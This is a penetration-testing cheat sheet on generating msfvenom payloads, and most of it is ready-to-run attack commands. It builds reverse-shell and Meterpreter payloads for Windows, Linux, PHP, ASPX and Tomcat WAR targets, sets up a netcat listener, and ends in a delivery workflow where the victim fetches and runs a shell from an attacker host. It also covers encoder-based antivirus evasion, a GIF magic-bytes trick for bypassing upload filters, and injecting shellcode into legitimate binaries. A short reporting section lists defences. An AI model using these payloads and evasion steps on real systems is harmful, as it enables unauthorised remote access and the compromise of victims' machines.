🛡️ Methodology Checklist
- Windows x64 EXE:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o shell.exe - Linux ELF:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf -o shell - PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f raw -o shell.php - WAR (Tomcat):
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war -o shell.war - Set up matching handler before delivering
- Verify payload architecture matches target
🎯 Operational Context
Use when: Generating standalone payloads for delivery outside MSF — EXE, DLL, shellcode, Python, PHP, PowerShell, VBA formats.
Think Dumber First: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=443 -f exe > shell.exe — use port 443 (HTTPS-like) to blend with egress traffic. Always match architecture. Use -e x86/shikata_ga_nai -i 5 for basic encoding (won’t beat modern AV alone).
Skip when: Target has modern EDR — msfvenom executables have high detection rates without obfuscation.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
msfvenom -l payloads | List all available payloads |
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f elf > shell.elf | Linux 64-bit stageless reverse shell (ELF) |
msfvenom -p windows/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f exe > shell.exe | Windows stageless reverse shell (EXE) |
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f aspx -o shell.aspx | Windows ASPX reverse shell (IIS) |
msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw > shell.php | PHP reverse shell (Linux web server) |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f war -o shell.war | Java WAR reverse shell (Tomcat) |
msfvenom -p windows/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe | Windows encoded payload (Shikata Ga Nai, 10 iterations) |
echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[TARGET_IP] LPORT=443 -f raw >> shell.php | PHP with GIF magic bytes (bypass content-type checks) |
sudo nc -lvnp 443 | Catch the incoming shell |
chmod +x shell.elf && ./shell.elf | Execute Linux payload (victim) |
🔬 Deep Dive & Workflow
Staged vs. Stageless — The Naming Convention
| Type | Identifier | Behavior | Example |
|---|---|---|---|
| Staged | Slash / in shell type | Tiny stager downloads rest of payload | linux/x86/shell/reverse_tcp |
| Stageless | Underscore _ in shell type | Entire payload in one file | linux/x86/shell_reverse_tcp |
Read it as: shell/reverse_tcp = “shell, THEN reverse_tcp” (two stages)
shell_reverse_tcp = “shell_reverse_tcp is one thing” (stageless)
Practical difference:
- Staged: smaller file, requires stable C2 connection for second download — can be fragile
- Stageless: larger file, more stable, generates less network traffic — preferred for reliability
Payload Format Reference
| Target | Format Flag | Extension | Use Case |
|---|---|---|---|
| Linux | -f elf | .elf | Standard Linux executable |
| Windows | -f exe | .exe | Standard Windows executable |
| Windows IIS | -f aspx | .aspx | Web server code execution |
| PHP web | -f raw | .php | PHP web server |
| Java/Tomcat | -f war | .war | Java application server |
| PowerShell | -f ps1 | .ps1 | PowerShell script |
Encoding for AV Evasion
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=443 \
-e x86/shikata_ga_nai -i 10 -f exe > encoded.exe-e x86/shikata_ga_nai— XOR-based polymorphic encoder (most common)-i 10— 10 encoding iterations
What encoding does:
- Adds a “decoder stub” to the file header
- Decoder runs at execution time, unpacks payload into RAM
- Bypasses static (disk) AV scans
- Modern AV with behavior analysis catches it after execution — only buys you the download
Without encoding: Defender blocks the download. With encoding: File downloads, may get caught mid-execution.
Magic Bytes Bypass (PHP File Upload Checks)
echo 'GIF89a;' > shell.php
msfvenom -p php/reverse_php LHOST=[IP] LPORT=443 -f raw >> shell.phpPrepending GIF89a; makes the file look like a GIF to content-type validators while remaining valid PHP.
Full Delivery Workflow
# 1. Generate payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.x LPORT=443 -f elf > shell.elf
# 2. Start listener
sudo nc -lvnp 443
# 3. Host for delivery
sudo python3 -m http.server 80
# 4. Victim downloads and runs
wget http://[ATTACKER_IP]/shell.elf && chmod +x shell.elf && ./shell.elf🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Generated EXE detected by AV | Default msfvenom signatures | Use custom encoders, Veil, or manually inject shellcode into a legitimate binary |
| Payload architecture wrong | Default x86 payload on x64 system | Specify: msfvenom -p windows/x64/... or check target with systeminfo | grep 'System Type' |
| PHP payload returns 500 error | PHP not enabled or wrong path | Test with <?php phpinfo(); ?> first; confirm system() not disabled in php.ini |
| PowerShell payload too long for command injection | Character limit | Base64 encode the command: msfvenom -f psh-cmd generates encoded PS one-liner |
| DLL payload not loading | Wrong DLL export | Use msfvenom -f dll and verify exports with dumpbin /exports shell.dll on Windows |
📝 Reporting Trigger
Finding Title: Standalone Payload Generated and Delivered for RCE Impact: Custom msfvenom payload bypasses signature-based AV and delivers Meterpreter session, enabling full post-exploitation without requiring direct MSF exploit execution. Root Cause: No application allowlisting or behavioral analysis to detect shellcode execution within signed or unsigned executables. Recommendation: Implement application allowlisting (WDAC/AppLocker). Deploy behavioral EDR to detect shellcode injection patterns. Network-level egress filtering to block outbound C2 on non-standard ports.